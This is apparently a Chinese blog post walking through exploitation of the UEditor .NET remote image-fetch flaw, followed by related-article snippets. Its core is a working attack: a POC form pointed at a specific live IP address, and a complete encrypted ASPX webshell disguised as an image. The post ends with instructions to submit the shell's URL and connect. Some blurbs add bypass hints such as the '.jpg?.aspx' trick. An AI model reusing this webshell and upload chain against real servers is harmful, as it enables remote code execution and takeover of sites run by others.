UEditor编辑器任意文件上传

最新推荐文章于 2024-08-02 12:04:32 发布
原创 最新推荐文章于 2024-08-02 12:04:32 发布 · 2.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了UEditor编辑器的一个远程下载功能漏洞,该漏洞可能导致任意文件上传。通过构造特定的HTML并利用此功能,可以将文件以.php格式写入,并实现非法操作。详细步骤包括创建POC,建立本地服务器,编写.HTACCESS文件,以及文件的输出和提交过程。

前言:
UEditor编辑器远程下载功能漏洞导致任意文件上传

复现:
1.自己构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data , 之前见到有poc指定了这个值。完整的poc如下

<form action="http://47.98.50.253:8001/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">

  <p>shell addr:<input type="text" name="source[]" /></p >
  
  <input type="submit" value="Submit" />
  
</form>

打开poc
在这里插入图片描述
本地服务器建一个1234.aspx 文件
内容:

<?php header('content-type: image/jpeg');  ?>
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>

.htaccess文件写入
在这里插入图片描述
将文件输出为.php 文件

写入poc
在这里插入图片描述

提交,连接!

实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 2万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueditor编辑器任意文件上传
课嗨教育的专栏
04-02 881
事情起源于项目,本身我并没有关注过ueditor方面,遇到一个网站也是纯属尝试下,但是居然搞定了。 那就从官方下载代码来看下额 下载地址:http://ueditor.baidu.com/website/download.html#ueditor POST /utf8-php/php/controller.php?action=uploadimage HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64.
UEditor .Net版本任意文件上传漏洞
MD@@nr丫卡uer
12-04 1360
UEditor .Net版本任意文件上传漏洞 一、漏洞介绍 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。 漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。 Crawler方法对source[]的检查仅仅是一个ContentType if (response.ContentType.IndexOf("image") == -1) { State = "Url is not an image"; re
UEditor .net版本任意文件上传
qax
11-22 1276
UEditor .net版本任意文件上传 简介 ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文本编辑器,近几年很少被曝出漏洞,事情没有绝对的,总会有漏洞,这次被曝出的漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 1万+
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
ueditor任意文件上传漏洞与解决方案
最新发布
菜鸟成长史
08-02 4173
是一款颇为老旧的富文本编辑器,曾经普遍流行过所以在一些老的项目里面,还会存在。但是该项目到目前为止已经永久停止更新,所以当发现漏洞时,只能自己维护。最好停止使用并更换富文本编辑器组件。
UEditor 任意文件上传漏洞
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
UEditor编辑器两个版本任意文件上传漏洞分析
weixin_34009794的博客
12-30 1246
0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点 ,被广大WEB应用程序所使用;本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 ...
4. UEditor 实现 自定义上传
Eden 的博客
08-05 1108
新建 UploadImageServlet 接受前段上传请求、保存图片、返回信息。UploadImageServlet 代码。UploadImageServlet 中的。新建 diyindex.html。与 config.json 中的。修改前台上传图片访问路径。doPost 方法代码。
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 2313
该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET。
Ueditor上传研究
qian0021514578
09-15 252
 之前写过一版本的ueditor的使用方式,感觉后来ueditor升级很快,转眼间又升级了,今天有一个人问这块相关的问题,正好又熟悉下。      首先最基本的用法我就不讲了,只讲文件上传的这块。      首先,文件上传这块和之前的变化很大,先慢慢的讲讲用法。      1. java版本的在jsp目录的文件结构如下:                        从这地方可以...
[应用漏洞]UEditor .NET版本任意文件上传漏洞
不忘初心,护天下安全!
07-23 1941
一、UEditor
ueditor使用配置总结
热门推荐
小小白学编程
12-28 7万+
项目中使用了ueditor编辑器,刚开始的时候真的是一头雾水,不过后来总算是能够将ueditor整合到项目中了,现在把自己的配置过程记录一下: 一、首先得让编辑器能够在页面上显示出来,这个在官方文档写的非常的详细,可直接按照官方文档的说明即可成功配置,我按如下步骤配置: (1)我下载的是jsp版本的,解压后放在项目中自己的某个位置即可,我放在如下: (2)导入所需的文件,注意文件在项目中
百度Ueditor富文本编辑器 .net版本 任意文件上传执行漏掉修复
12-17 355
问题描述: 借由上传网络图片功能中可传递可执行文件。后台代码中只做了文件类型的检测未能正确的拦截掉非法文件。 只需将上传地址改为 XXXXXX.jpg?.aspx最终服务上最终存储的文件会变为XXXXXX.aspx 具体漏洞描述可查看此链接 https://www.freebuf.com/vuls/181814.html 2.解决方法 目前采用的方法是修改Craw...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值